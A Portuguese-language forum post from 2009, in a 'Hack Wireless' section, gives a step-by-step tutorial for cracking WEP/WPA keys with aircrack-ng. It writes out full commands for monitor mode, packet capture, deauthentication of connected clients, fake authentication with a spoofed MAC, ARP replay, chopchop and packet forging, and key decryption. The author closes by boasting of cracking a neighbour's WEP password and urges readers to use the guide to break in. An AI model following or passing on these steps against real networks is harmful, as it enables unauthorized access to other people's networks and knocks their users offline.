Slackpirate
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.

Slackpirate

Downloads Diversos
 
InícioSLACKPIRATE PORÚltimas imagensProcurarRegistarEntrar

 

 Aircrack-ng: atacar a rede wireless e quebrar senhas WEP e WAP1

Ir para baixo 
AutorMensagem
Admin
Admin
Admin



Aircrack-ng: atacar a rede wireless e quebrar senhas WEP e WAP1 Empty
MensagemAssunto: Aircrack-ng: atacar a rede wireless e quebrar senhas WEP e WAP1   Aircrack-ng: atacar a rede wireless e quebrar senhas WEP e WAP1 Icon_minitimeDom Jan 18, 2009 7:03 am

Aqui temos um tutorial de como obter a chave de uma rede wireless!!!

Começando
Para quem nunca viu ou tem curiosidade de aprender um pouco mais sobre rede wireless, sugiro que busca mais informações no link abaixo:

* http://www.warchalking.com.br

Pois nele há uma bom caminho para aprender sobre rede wireless, defesa e ataque e é bastante interessante!

Bom, vamos começar nosso artigo:

Primeiro: Todos os arquivos de captura de pacotes devem ter a seguinte extensão: *.cap, *.ivs.

Segundo: Vamos instalar o aircrack-ng: uso Debian e creio que nas outras distro devem vir com o pacote por padrão no gerenciador de arquivos da distro (no caso do debians-like, aptitude ou apt-get, no Gentoo emerge e no Red-Had-like yum, e assim vai... basta você pesquisar no Google). Caso você não ache em seu gerenciador de pacotes, pode baixar da net e instalar manualmente, segue o site do aircrack-ng:

* http://www.aircrack-ng.org

AIRMON-NG (vem instalado com o aircrack-ng):

Esta é a ferramenta para colocarmos nossa placa de rede wireless no estado monitor! Devemos fazer isso antes de começar a capturar pacotes da rede wireless.

Façamos o seguinte comando como root ou administrador:

airmon-ng <start|stop> <interface> [channel]

Onde:
* <start|stop> inicia ou para de monitorar;
* <interface> sua interface de rede ex.: ethX, rawX, athX, etc;
* [channel] é o canal que sua placa de rede wireless irá trabalhar

Beleza, feito isso vamos para o segundo tópico!

Captura de pacotes
Pronto, agora com sua placa de rede monitorando a rede wireless presente por perto, vamos para uma parte importante de quebra de rede wireless... a captura dos pacotes transmitidos pelo protocolo 802.11! Usaremos a seguinte ferramenta que também vem com aircrack-ng, que se chama:

AIRODUMP-NG

Sua principal finalidade é capturar e coletar ivs (Initialization Vectors) dos pacotes WEP, para que após coletados usaremos a ferramenta chamada aircrack-ng para sabermos qual chave esse pacote WEP que capturamos está usando.

OBS: Caso no seu computador aja algum receptor GPS, o airodump-ng irá mostrar o posicionamento em coordenadas, que se encontra o Access Point que você está coletando pacotes... legal não?!

Usando o airodump-ng como root:

airodump-ng <options> <interfaces>

<interfaces> - interfaces da sua placa de rede (ethX, athX, rawX, wifiX, etc)

Suas <options> são:

* -ivs: Somente capturar ivs;
* --gpsd: Usar um dispositivo GPS, caso tenha;
* --write: Cria um arquivo com o nome escolhido e com a extensão (*.cap ou *.ivs) e começa a capturar;
* -w: É o mesmo que --write;
* --beacons: Guarda os beacons (não é guardado por padrão);
* --channel ou -c: Especifica um canal para a captura;
* -a: Captura na frequência de 5Ghz específica da banda A;
* --abg: Captura tanto em frequências de 2,4Ghz como em 5 Ghz.

Bom, por padrão o airodump-ng captura pacotes dentro dos canais que se encontram na frequência de 2.4GHz.

Capturando e escrevendo no arquivo teste.ivs, no canal 11, nas frequências entre 2.4 à 5 GHz e com a interface da placa de rede wireless:

# airodump-ng --ivs -w teste.ivs -c 11 -abg ath0

Captura de pacotes com arquivo teste.cap, no canal 11, nas frequências entre 2.4 à 5 GHz e com a interface da placa de rede wireless:

# airodump-ng -w teste.cap -c 11 -abg ath0

O programa airodump-ng oscila entre WEP e WAP, quando o sua placa não rejeita pacotes corrompidos. O airodump-ng irá mostra isso no terminal:




Vamos entendê-los agora:




PS.: Lamento, está em espanhol mas dá para entender... eu fiquei com preguiça de traduzir =))))))) hehehe!

Atacando a rede wireless
Depois de capturados o pacotes da rede, vamos ver agora como atacar a rede wireless com a seguinte ferramenta, que também vem com o aircrack-ng.

AIREPLAY-NG:

Há cinco maneiras diferentes de atacar com o aireplay-ng, o programa aireplay-ng classifica da seguinte maneira:
* 0: Desautenticação;
* 1: Autentificação falsa;
* 2: Seleção interativa do pacote a enviar;
* 3: Reinjeção de requisição ARP;
* 4: O chamado "chopchop" de KoreK (predicção de CRC), pois ele utiliza essa classificação como referência para o ataque!

Ataque zero
Faz com que o usuário conectado ao AP (Access Point) desautentique e volte a conectar, fazendo assim que ele faça uma nova requisição ARP e enviar um novo handshake. Neste ataque podemos utilizar várias maneiras:

Capturar Handshake WAP:

# aireplay-ng -0 5 -a MACdoAP -c MAC do Client <interface>

Reinjeção ARP (ataque 3):

# aireplay-ng -0 10 -a MACdoAP <interface>

(faz todos os usuários conectados ao AP caírem para nova requisição ARP)

# aireplay-ng -3 -b MACdoAP -h MAC do Client <interface>

(reinjeção dos pacotes obtidos)

Rejeitar que o cliente se conecte:

# aireplay-ng -0 0 -a MACdoAP <interface>

(todos os clientes conectados ao AP)

# aireplay-ng -0 0 -a MACdoAP -c MACdoCliente <interface>

(somente um cliente)

Ataque um
Este ataque funciona com êxito quando temos um cliente conectado ao AP, caso não tenha, faremos uma cliente para conectar a esse AP. Mas lembre-se, é melhor quando temos uma cliente conectado ao AP, pois assim geraremos tráfego ARP.

Vamos mudar o nosso MAC:

# ifconfig <interface> down
# ifconfig <interface> hw ether 00:11:22:33:44:55
# ifconfig <interface> up

Agora vamos atacar:

# aireplay-ng -1 0 -e SeuESSID -a MACdoAP -h 00:11:22:33:44:55 <interface>

Se der certo aparecerá algo assim:

12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)

Como alguns APs podem requerer autenticação de tantos em tantos segundos, o aireplay-ng consegue fazer isso da seguinte maneira:

# aireplay-ng -1 <QntdeSegundos> -e SeuESSIDFalso -a MACdoAP -h 00:11:22:33:44:55 <interface>

Caso este ataque não seja bem sucedido (aireplay continua enviando pacotes de pedido de autenticação), pode ser que esteja usando filtro de MAC Address. Verifique o seguinte também:

Está com o controlador corretamente instalado e com os patches devidamente aplicados.

A placa wireless está configurada no mesmo canal que o Access Point.

O BSSID e o ESSID (opções -a / -e) são as corretas. Se for Prism2, verifique se o firmware está atualizado.

Algumas placas de rede só suportam associar e injetar/monitorar através da interface <interface>Xraw, por isso talvez você precise fazer:

# ifconfig <interface> down hw ether 00:11:22:33:44:55
# iwconfig <interface> mode Managed essid 'the ssid' key AAAAAAAAAA
# ifconfig <interface> up

# sysctl -w dev.<interface>.rawdev=1 (Cria o <interface>Xraw)
# ifconfig <interface>raw up
# airodump-ng <interface>raw out 6

Então você poderá usar os ATAQUES 3 e 4 (o aireplay-ng substitui o <interface> pela <interface>raw que criamos caso sua placa precise).

# aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface> (ATAQUE 3)
# aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 <interface> (ATAQUE 4)

Ataque dois
Peço desculpas, mas este ataque dois eu não entendi muito bem... vou tentar falar mais o menos o que eu capturei... caso alguém saiba, favor postar um comentário para me ajudar a entender e aos outros!!! VLWWWWW.

Ele pode selecionar um pacote qualquer e enviá-lo...

# aireplay-ng -2 -b MACdoAP -n 100 -p 0841 -h MACdoClient -c MACdoAP <interface>

hehehehe =D

Ataque três
O famoso ataque de reinjeção de de requisição ARP é o mais efetivo para gerar IVs, e funciona muito bem!!! =) Este ataque requer um MAC de um cliente associado ou um MAC falso como montamos no ATAQUE 1! Este ataque pode demorar bastanteee... até que apareça a requisição ARP, ele falhará rapidamente se não houver tráfego.

Como usamos no ATAQUE 1:

# aireplay-ng -3 -h 00:11:22:33:44:55 -b MACdoAP <interface>

Aparecerá o seguinte:

Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

Ataque quatro
Ataque nomeado de "chopchop" de KoreK, este ataque é ótimo quando bem sucedido, pois ele desencripta um pacote WEP sem conhecer a sua chave e também pode usar uma WEP dinâmica.

Pelo o que eu li esse ataque não recupera a chave WEP, ele só revela em texto plano. Alguns APs não são tão vulneráveis assim. Outros parecem até demais (vulneráveis) pelo fato fato de jogarem os pacotes menores que 60 bytes.

O aireplay-ng consegue adivinhar o resto pacotes, que são menores que 42 bytes, que são jogados pelos APs, assim que o header tornar-se predictível.

Primeiro, decriptamos um pacote:

# aireplay-ng -4 <interface>

Se não funcionar é porque o AP precisa de um MAC específico filtrado neste AP. Assim, termos que usar um MAC de um cliente está conectado no AP:

# aireplay-ng -4 -h MACdoCLiente <interface>

Segundo olharemos o IP:

# tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap

Aparecerá algo assim:

reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

Agora, forjamos uma requisição ARP:

# arpforge-ng replay_dec-0627-022301.xor 1 MACdoCliente MACdoAP 192.168.1.100 192.168.1.2 arp.cap

A faixa de IP inicial (192.168.1.100) não importa, mas sim a de destino (192.168.1.2).

Reenviando o ARP forjado:

# aireplay-ng -2 -r arp.cap ath0

Uhullll loco neh!!?!?!
Vamos para o final, que fala sobre como decriptar a chave capturada.

Decriptando as chaves dos pacotes capturados... (FIM)
Vamos utilizar a ferramenta:

AIRDECAP-NG

Serve para decriptar a chave WEP/WAP1 que foi capturada no arquivo.cap.

airdecap-ng [opções]

As opções:



PS: Também não estão traduzidas... mas dá para entender hehehehe!!! =DDDD

Segue o exemplo:

# airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap
# airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap
# airdecap-ng -e 'the ssid' -p passphrase tkip.cap

Bom é isso pessoall, seguem uns links de sites muitos bons...

* http://hwagm.elhacker.net
* http://www.warchalking.com.br
* http://www.mundowifi.com.br
* http://www.aircrack-ng.org


Falô galera... espero que tenham gostado do tutoriall... não ficou uns dos melhores explicados, mas foi mais ou menos assim que aprendi e gostaria de compartilhar com vocês essa ferramenta.

Ah, e pode usar este tuto para invadir também que funciona, eu quebrei a senha wep do meu vizinho... se quiserem aprender mais leiam, há muita coisa na net em inglês e espanhol. Divirtam-se e abraço a todossss hehehe =)
Ir para o topo Ir para baixo
 
Aircrack-ng: atacar a rede wireless e quebrar senhas WEP e WAP1
Ir para o topo 
Página 1 de 1
 Tópicos semelhantes
-
» Quebrar a criptografia do HD com um Spray
» Aircrack (como aceder a internet wirless)

Permissões neste sub-fórumNão podes responder a tópicos
Slackpirate :: Hack Wireless-
Ir para: